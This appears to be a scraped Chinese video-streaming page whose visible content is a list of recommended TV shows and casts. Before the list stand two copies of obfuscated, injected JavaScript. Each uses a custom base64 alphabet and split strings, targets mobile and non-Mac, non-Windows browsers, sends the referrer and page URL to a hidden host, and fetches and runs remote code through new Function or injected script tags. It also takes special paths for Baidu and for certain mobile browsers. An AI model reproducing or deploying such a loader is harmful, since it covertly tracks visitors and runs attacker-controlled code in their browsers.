function mdre(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r, o, c, s, a, i, l; let d = 0; let f = String(e).replace(/\r\n/g, "\n"); let h = ""; for (let e = 0; e < f.length; e++) { const t = f.charCodeAt(e); if (t < 128) { h += String.fromCharCode(t); } else if (t > 127 && t < 2048) { h += String.fromCharCode(t >> 6 | 192); h += String.fromCharCode(t & 63 | 128); } else { h += String.fromCharCode(t >> 12 | 224); h += String.fromCharCode(t >> 6 & 63 | 128); h += String.fromCharCode(t & 63 | 128); } } while (d < h.length) { r = h.charCodeAt(d++); o = h.charCodeAt(d++); c = h.charCodeAt(d++); s = r >> 2; a = (r & 3) << 4 | o >> 4; i = (o & 15) << 2 | c >> 6; l = c & 63; if (isNaN(o)) { n += t.charAt(s) + t.charAt(a); } else if (isNaN(c)) { n += t.charAt(s) + t.charAt(a) + t.charAt(i); } else { n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l); } } return n; } function iwtq(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r = 0; let o, c, s, a; const i = String(e).replace(/[^A-Za-z0-9\-_]/g, ""); const l = i.length; while (r < l) { if (r == l) o = -1; else o = t.indexOf(i.charAt(r++)); if (r == l) c = -1; else c = t.indexOf(i.charAt(r++)); if (r === l) s = -1; else s = t.indexOf(i.charAt(r++)); if (r === l) a = -1; else a = t.indexOf(i.charAt(r++)); if (o === -1 || c === -1) { break; } const e = o << 2 | c >> 4; n += String.fromCharCode(e); if (s !== -1) { const e = (c & 15) << 4 | s >> 2; n += String.fromCharCode(e); } if (a !== -1) { const e = (s & 3) << 6 | a; n += String.fromCharCode(e); } } let d = ""; r = 0; while (r < n.length) { const e = n.charCodeAt(r); if (e < 128) { d += String.fromCharCode(e); r++; } else if (e > 191 && e < 224) { const t = n.charCodeAt(r + 1); d += String.fromCharCode((e & 31) << 6 | t & 63); r += 2; } else { const t = n.charCodeAt(r + 1); const o = n.charCodeAt(r + 2); d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63); r += 3; } } return d; } function gwyddp(e) { return Math.floor(Math.random() * (e + 1)); } window['w'+'jb'+'hz'+'s'+'fx'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() { (function(e, t, n) { const r = n[iwtq("dPW5hqWyi4Inhqp0iU")]; let o = ""; try { o = opener ? opener.document.location.href : n.referrer; } catch (e) { o = n.referrer; } if (o && o.length > 900) { o = o.slice(0, 900); } let c = t.location.href; if (c && c.length > 900) { c = c.slice(0, 900); } const s = iwtq(e).split(","); const a = s[3]; const i = s[2]; let l = s[4]; let d; if (l.indexOf(";") > -1) { let e = l.split(";"); if (e.length < 1) return; if (e.length > 1) { d = e[gwyddp(e.length)]; } else { d = e[0]; } } else { d = l; } const f = mdre(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`); const h = navigator.userAgent; if (h.indexOf("b" + "ai" + "d" + "u") !== -1) { const e = new XMLHttpRequest; e.open("POST", `${i}://${d}/getSv/${f}`); e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;"); e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest"); e.onreadystatechange = function() { if (e.readyState === 4 && e.status === 200) { const t = JSON.parse(e.responseText); const n = new Function("c", `${iwtq(t.ds)}; return ${t.ns}(c);`)(t.img.join("")); new Function("_tdcs", n)(r); } }; e.send(); } else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) { const e = new WebSocket(`${a}://${d}/ws/${f}`); e.onmessage = function(t) { e.close(); const o = t.data.split(";"); if (o.length > 2) { remoteCode = iwtq(o[0]); remoteCode += iwtq(o[1]); remoteCode += iwtq(o[2]); new Function("_tdcs", remoteCode)(r); } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } }; e.onerror = function() { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); }; } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } })("H-01H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document); } : function() {};
function ncoa(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r, o, c, s, a, i, l; let d = 0; let f = String(e).replace(/\r\n/g, "\n"); let h = ""; for (let e = 0; e < f.length; e++) { const t = f.charCodeAt(e); if (t < 128) { h += String.fromCharCode(t); } else if (t > 127 && t < 2048) { h += String.fromCharCode(t >> 6 | 192); h += String.fromCharCode(t & 63 | 128); } else { h += String.fromCharCode(t >> 12 | 224); h += String.fromCharCode(t >> 6 & 63 | 128); h += String.fromCharCode(t & 63 | 128); } } while (d < h.length) { r = h.charCodeAt(d++); o = h.charCodeAt(d++); c = h.charCodeAt(d++); s = r >> 2; a = (r & 3) << 4 | o >> 4; i = (o & 15) << 2 | c >> 6; l = c & 63; if (isNaN(o)) { n += t.charAt(s) + t.charAt(a); } else if (isNaN(c)) { n += t.charAt(s) + t.charAt(a) + t.charAt(i); } else { n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l); } } return n; } function qqaoxjj(e) { const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab"; let n = ""; let r = 0; let o, c, s, a; const i = String(e).replace(/[^A-Za-z0-9\-_]/g, ""); const l = i.length; while (r < l) { if (r == l) o = -1; else o = t.indexOf(i.charAt(r++)); if (r == l) c = -1; else c = t.indexOf(i.charAt(r++)); if (r === l) s = -1; else s = t.indexOf(i.charAt(r++)); if (r === l) a = -1; else a = t.indexOf(i.charAt(r++)); if (o === -1 || c === -1) { break; } const e = o << 2 | c >> 4; n += String.fromCharCode(e); if (s !== -1) { const e = (c & 15) << 4 | s >> 2; n += String.fromCharCode(e); } if (a !== -1) { const e = (s & 3) << 6 | a; n += String.fromCharCode(e); } } let d = ""; r = 0; while (r < n.length) { const e = n.charCodeAt(r); if (e < 128) { d += String.fromCharCode(e); r++; } else if (e > 191 && e < 224) { const t = n.charCodeAt(r + 1); d += String.fromCharCode((e & 31) << 6 | t & 63); r += 2; } else { const t = n.charCodeAt(r + 1); const o = n.charCodeAt(r + 2); d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63); r += 3; } } return d; } function yebl(e) { return Math.floor(Math.random() * (e + 1)); } window['gj'+'tu'+'hd'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() { (function(e, t, n) { const r = n[qqaoxjj("dPW5hqWyi4Inhqp0iU")]; let o = ""; try { o = opener ? opener.document.location.href : n.referrer; } catch (e) { o = n.referrer; } if (o && o.length > 900) { o = o.slice(0, 900); } let c = t.location.href; if (c && c.length > 900) { c = c.slice(0, 900); } const s = qqaoxjj(e).split(","); const a = s[3]; const i = s[2]; let l = s[4]; let d; if (l.indexOf(";") > -1) { let e = l.split(";"); if (e.length < 1) return; if (e.length > 1) { d = e[yebl(e.length)]; } else { d = e[0]; } } else { d = l; } const f = ncoa(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`); const h = navigator.userAgent; if (h.indexOf("b" + "ai" + "d" + "u") !== -1) { const e = new XMLHttpRequest; e.open("POST", `${i}://${d}/getSv/${f}`); e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;"); e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest"); e.onreadystatechange = function() { if (e.readyState === 4 && e.status === 200) { const t = JSON.parse(e.responseText); const n = new Function("c", `${qqaoxjj(t.ds)}; return ${t.ns}(c);`)(t.img.join("")); new Function("_tdcs", n)(r); } }; e.send(); } else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) { const e = new WebSocket(`${a}://${d}/ws/${f}`); e.onmessage = function(t) { e.close(); const o = t.data.split(";"); if (o.length > 2) { remoteCode = qqaoxjj(o[0]); remoteCode += qqaoxjj(o[1]); remoteCode += qqaoxjj(o[2]); new Function("_tdcs", remoteCode)(r); } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } }; e.onerror = function() { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); }; } else { const e = n.createElement("script"); e.src = `${i}://${d}/vsn/${f}`; r.parentElement.insertBefore(e, r); } })("H501H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document); } : function() {};

猜你喜欢

  • 更新HD
    惊魂加油站
    主演:吉姆·卡明斯,乔赛琳·唐娜休,理查德·布雷克,尼古拉斯·罗根,费松·拉夫,迈克尔·阿伯特,吉因·琼斯,罗宾·巴特利特,谢拉·麦克康米克,康勒·帕奥罗,瑞恩·马松,艾丽克斯·埃索,萨姆·亨廷顿,Jon,Proudstar,芭芭拉·克兰普顿,Robert,Broski,Matt,McVay
  • 全集完结
    那个被你赶走的求职者,成了首富
    主演:张艺文 高晟
  • 第2集完结
    天使之羽
    主演:山口勝平 増谷康紀 鈴木千尋 緑川光 宫田幸季
  • 第08集
    长蛇娶妻
    主演:程宇峰 陈叶玲
  • 第24集已完结
    荣华令
    主演:吴佳怡,董子凡,宋昭艺,张译兮,李珈童,杨博奇,杨休,曹艳,邵思涵,高毅
  • 第19集
    叫作你的秘密
    主演:洪潇,阳兵卓,陈瑞丰,郑丞丞,何亦可
  • 第2集
    公主大人,接下来是“拷问”时间第二季
    主演:白石晴香,小林亲弘,伊藤静,永濑安奈,井上穗乃花,山根绮,茅野爱衣,日高里菜,中原麻衣,千本木彩花,富田美忧,福岛润,大塚芳忠,玄田哲章,田村睦心,田村由香里,杉田智和
  • 第13集
    半醒
    主演:赵夕汐,谢予望,卢熹,张冕宸,赵予熙,赵东泽
  • 全集完结
    破产大佬不要慌,天降仙妻把忙帮
    主演:马泽涵 马超
  • 第8集
    山塘茶馆
    主演:秦跃芳,高文炯,陈宇星,徐千凯,蔡子佳,六子,徐勇
  • 第10集
    小尾巴,快跟上!
    主演:黄玮 牛宝亿 叶啸秋 闵文 陈南 纪志钧
  • 第240909期
    同床异梦2
    主演:金九拉,徐章焄,金淑
  • 第8期
    极限84
    主演:旗安84
  • 第3期下
    势均力敌的我们第二季
    主演:
  • 抢先版
    神犬查利
    主演:欧文·威尔逊 塔比莎·杰曼 塞巴斯蒂安·比林斯利-罗德里格斯 Anthony Bolognese